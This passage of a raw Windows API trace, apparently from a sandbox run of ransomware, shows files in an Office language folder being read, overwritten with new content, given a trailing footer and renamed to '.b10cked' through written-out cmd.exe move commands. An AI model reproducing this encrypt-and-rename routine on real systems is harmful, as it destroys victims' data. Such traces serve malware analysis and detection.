(in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0152.850] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5faf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5faf, lpOverlapped=0x0) returned 1 [0152.850] SetFilePointer (in: hFile=0x114, lDistanceToMove=-24495, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5fb1 [0152.850] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5faf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5faf, lpOverlapped=0x0) returned 1 [0152.851] SetFilePointer (in: hFile=0x114, lDistanceToMove=-24495, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5fb1 [0152.851] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5faf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5faf, lpOverlapped=0x0) returned 1 [0152.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRINTL32.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0152.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRINTL32.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRINTL32.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0152.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xbf60 [0152.855] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0152.855] CloseHandle (hObject=0x114) returned 1 [0152.857] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX") returned 0x3c [0152.858] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0152.858] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xe50, dwThreadId=0xec4)) returned 1 [0152.864] CloseHandle (hObject=0x110) returned 1 [0152.864] CloseHandle (hObject=0x114) returned 1 [0152.864] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0152.864] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0152.864] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0152.864] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0152.864] ReleaseMutex (hMutex=0xf8) returned 1 [0152.864] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0152.864] ReleaseMutex (hMutex=0xf8) returned 1 [0152.864] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0152.864] ReleaseMutex (hMutex=0xf8) returned 1 [0152.864] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0152.865] ReleaseMutex (hMutex=0xf8) returned 1 [0152.865] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0152.865] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.865] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.866] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20965481156) returned 1 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3d960 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3d478 [0152.867] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0152.986] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0152.986] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0152.986] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3d960 [0152.986] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0152.986] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0152.986] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0152.986] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3d960 [0152.986] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0152.986] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0152.986] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0152.992] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0152.994] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xcaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xcaf, lpOverlapped=0x0) returned 1 [0152.998] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0152.998] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0152.998] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0152.999] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xcaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xcaf, lpOverlapped=0x0) returned 1 [0152.999] SetFilePointer (in: hFile=0x114, lDistanceToMove=-126127, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ecb1 [0152.999] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0152.999] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.000] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xcaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xcaf, lpOverlapped=0x0) returned 1 [0153.001] SetFilePointer (in: hFile=0x114, lDistanceToMove=-126127, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ecb1 [0153.001] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.001] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.002] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xcaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xcaf, lpOverlapped=0x0) returned 1 [0153.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRINTL32.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0153.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRINTL32.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x1328744, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRINTL32.REST.trx_dll", lpUsedDefaultChar=0x0) returned 21 [0153.007] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3d960 [0153.007] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0153.007] CloseHandle (hObject=0x114) returned 1 [0153.009] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX") returned 0x3c [0153.010] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0153.010] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xddc, dwThreadId=0xd9c)) returned 1 [0153.016] CloseHandle (hObject=0x110) returned 1 [0153.016] CloseHandle (hObject=0x114) returned 1 [0153.016] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0153.016] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0153.016] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0153.016] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.017] ReleaseMutex (hMutex=0xf8) returned 1 [0153.017] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.017] ReleaseMutex (hMutex=0xf8) returned 1 [0153.017] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.017] ReleaseMutex (hMutex=0xf8) returned 1 [0153.017] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.017] ReleaseMutex (hMutex=0xf8) returned 1 [0153.017] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x49f60 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.018] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20980726906) returned 1 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x49f60 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x49f60 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x49f60 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x49f60 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x49f60 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 